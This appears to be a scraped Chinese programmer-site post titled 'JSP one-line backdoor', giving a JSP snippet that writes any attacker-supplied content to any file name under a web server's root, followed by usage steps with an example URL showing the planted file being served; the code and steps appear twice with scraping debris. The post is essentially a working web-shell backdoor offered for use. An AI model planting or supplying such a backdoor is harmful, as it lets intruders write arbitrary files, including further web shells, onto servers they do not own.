JSP一句话后门
程序员文章站
2023-12-10 14:04:40
<% if(request.getparameter("f")!=null)(new java.io.fileoutputstream(applicatio...
<%
if(request.getparameter("f")!=null)(new java.io.fileoutputstream(application.getrealpath("\\")+request.getparameter("f"))).write(request.getparameter("t").getbytes());
%>
使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=helloworld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 helloworld
if(request.getparameter("f")!=null)(new java.io.fileoutputstream(application.getrealpath("\\")+request.getparameter("f"))).write(request.getparameter("t").getbytes());
%>
使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=helloworld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 helloworld